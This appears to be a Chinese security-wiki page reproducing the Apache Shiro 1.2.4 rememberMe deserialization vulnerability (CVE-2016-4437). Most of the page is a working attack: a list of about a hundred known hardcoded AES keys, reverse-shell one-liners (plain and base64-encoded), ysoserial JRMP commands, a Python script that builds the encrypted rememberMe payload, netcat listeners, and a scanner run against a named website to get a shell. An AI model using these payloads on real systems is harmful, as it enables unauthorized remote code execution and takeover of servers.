menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right Apache Shiro chevron_right (CVE-2016-4437)Apache Shiro _=1.2.4 反序列化漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2016-4437)Apache Shiro _=1.2.4 反序列化漏洞.md
    5.12 KB / 2021-04-21 09:23:46
        (CVE-2016-4437)Apache Shiro 1.2.4 反序列化漏洞
================================================

一、漏洞简介
------------

Apache
shiro默认使用了`CookieRememberMeManager`,其处理cookie的流程是:得到`rememberMe的cookie值`\--\>`Base64解码`\--\>`AES解密`\--\>`反序列化`。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。

二、漏洞影响
------------

Apache Shiro \<=1.2.4

三、复现过程
------------

### 收集到的key

    kPH+bIxk5D2deZiIxcaaaA==
    4AvVhmFLUs0KTA3Kprsdag==
    Z3VucwAAAAAAAAAAAAAAAA==
    fCq+/xW488hMTCD+cmJ3aQ==
    0AvVhmFLUs0KTA3Kprsdag==
    1AvVhdsgUs0FSA3SDFAdag==
    1QWLxg+NYmxraMoxAXu/Iw==
    25BsmdYwjnfcWmnhAciDDg==
    2AvVhdsgUs0FSA3SDFAdag==
    3AvVhmFLUs0KTA3Kprsdag==
    3JvYhmBLUs0ETA5Kprsdag==
    r0e3c16IdVkouZgk1TKVMg==
    5aaC5qKm5oqA5pyvAAAAAA==
    5AvVhmFLUs0KTA3Kprsdag==
    6AvVhmFLUs0KTA3Kprsdag==
    6NfXkC7YVCV5DASIrEm1Rg==
    6ZmI6I2j5Y+R5aSn5ZOlAA==
    cmVtZW1iZXJNZQAAAAAAAA==
    7AvVhmFLUs0KTA3Kprsdag==
    8AvVhmFLUs0KTA3Kprsdag==
    8BvVhmFLUs0KTA3Kprsdag==
    9AvVhmFLUs0KTA3Kprsdag==
    OUHYQzxQ/W9e/UjiAGu6rg==
    a3dvbmcAAAAAAAAAAAAAAA==
    aU1pcmFjbGVpTWlyYWNsZQ==
    bWljcm9zAAAAAAAAAAAAAA==
    bWluZS1hc3NldC1rZXk6QQ==
    bXRvbnMAAAAAAAAAAAAAAA==
    ZUdsaGJuSmxibVI2ZHc9PQ==
    wGiHplamyXlVB11UXWol8g==
    U3ByaW5nQmxhZGUAAAAAAA==
    MTIzNDU2Nzg5MGFiY2RlZg==
    L7RioUULEFhRyxM7a2R/Yg==
    a2VlcE9uR29pbmdBbmRGaQ==
    WcfHGU25gNnTxTlmJMeSpw==
    OY//C4rhfwNxCQAQCrQQ1Q==
    5J7bIJIV0LQSN3c9LPitBQ==
    f/SY5TIve5WWzT4aQlABJA==
    bya2HkYo57u6fWh5theAWw==
    WuB+y2gcHRnY2Lg9+Aqmqg==
    kPv59vyqzj00x11LXJZTjJ2UHW48jzHN
    3qDVdLawoIr1xFd6ietnwg==
    ZWvohmPdUsAWT3=KpPqda
    YI1+nBV//m7ELrIyDHm6DQ==
    6Zm+6I2j5Y+R5aS+5ZOlAA==
    2A2V+RFLUs+eTA3Kpr+dag==
    6ZmI6I2j3Y+R1aSn5BOlAA==
    SkZpbmFsQmxhZGUAAAAAAA==
    2cVtiE83c4lIrELJwKGJUw==
    fsHspZw/92PrS3XrPW+vxw==
    XTx6CKLo/SdSgub+OPHSrw==
    sHdIjUN6tzhl8xZMG3ULCQ==
    O4pdf+7e+mZe8NyxMTPJmQ==
    HWrBltGvEZc14h9VpMvZWw==
    rPNqM6uKFCyaL10AK51UkQ==
    Y1JxNSPXVwMkyvES/kJGeQ==
    lT2UvDUmQwewm6mMoiw4Ig==
    MPdCMZ9urzEA50JDlDYYDg==
    xVmmoltfpb8tTceuT5R7Bw==
    c+3hFGPjbgzGdrC+MHgoRQ==
    ClLk69oNcA3m+s0jIMIkpg==
    Bf7MfkNR0axGGptozrebag==
    1tC/xrDYs8ey+sa3emtiYw==
    ZmFsYWRvLnh5ei5zaGlybw==
    cGhyYWNrY3RmREUhfiMkZA==
    IduElDUpDDXE677ZkhhKnQ==
    yeAAo1E8BOeAYfBlm4NG9Q==
    cGljYXMAAAAAAAAAAAAAAA==
    2itfW92XazYRi5ltW0M2yA==
    XgGkgqGqYrix9lI6vxcrRw==
    ertVhmFLUs0KTA3Kprsdag==
    5AvVhmFLUS0ATA4Kprsdag==
    s0KTA3mFLUprK4AvVhsdag==
    hBlzKg78ajaZuTE0VLzDDg==
    9FvVhtFLUs0KnA3Kprsdyg==
    d2ViUmVtZW1iZXJNZUtleQ==
    yNeUgSzL/CfiWw1GALg6Ag==
    NGk/3cQ6F5/UNPRh8LpMIg==
    4BvVhmFLUs0KTA3Kprsdag==
    MzVeSkYyWTI2OFVLZjRzZg==
    CrownKey==a12d/dakdad
    empodDEyMwAAAAAAAAAAAA==
    A7UzJgh1+EWj5oBFi+mSgw==
    YTM0NZomIzI2OTsmIzM0NTueYQ==
    c2hpcm9fYmF0aXMzMgAAAA==
    i45FVt72K2kLgvFrJtoZRw==
    U3BAbW5nQmxhZGUAAAAAAA==
    ZnJlc2h6Y24xMjM0NTY3OA==
    Jt3C93kMR9D5e8QzwfsiMw==
    MTIzNDU2NzgxMjM0NTY3OA==
    vXP33AonIp9bFwGl7aT7rA==
    V2hhdCBUaGUgSGVsbAAAAA==
    Z3h6eWd4enklMjElMjElMjE=
    Q01TX0JGTFlLRVlfMjAxOQ==
    ZAvph3dsQs0FSL3SDFAdag==
    Is9zJ3pzNh2cgTHB4ua3+Q==
    NsZXjXVklWPZwOfkvk6kUA==
    GAevYnznvgNCURavBhCr1w==
    66v1O8keKNV3TTcGPK1wzg==
    SDKOLKn2J1j/2BHjeZwAoQ==

### bash 转码地址

##### http://www.jackson-t.ca/runtime-exec-payloads.html

    bash -i >& /dev/tcp/127.0.0.1/1234 0>&1

1.png

姿势一
------

### 在vps上开启rmi注册表服务

    java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}'

4.png

### 生成payload

    python exploit.py vps:1099

5.png**exploit.py**

    import sys
    import uuid
    import base64
    import subprocess
    from Crypto.Cipher import AES
    def encode_rememberme(command):
        popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
        BS = AES.block_size
        pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
        key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
        iv = uuid.uuid4().bytes
        encryptor = AES.new(key, AES.MODE_CBC, iv)
        file_body = pad(popen.stdout.read())
        base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
        return base64_ciphertext


    if __name__ == '__main__':
        payload = encode_rememberme(sys.argv[1])    
    print "rememberMe={0}".format(payload.decode())

### nc监听

    nc -lvvp 8888

### 使用burp发送生成好的payload

6.png

### 获取到shell

7.png

姿势二 【实战测试中,可能会有部分网站无法成功】
-----------------------------------------------

### poc

##### https://github.com/ianxtianxt/ShiroScan

**首先我们在服务器中进行监听**

    nc -lvvp 1234

**执行poc进行反弹shell**

    python3 shiro.py https://www.0-sec.org "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}"

2.png

**获取到shell**3.png
    links
    file_download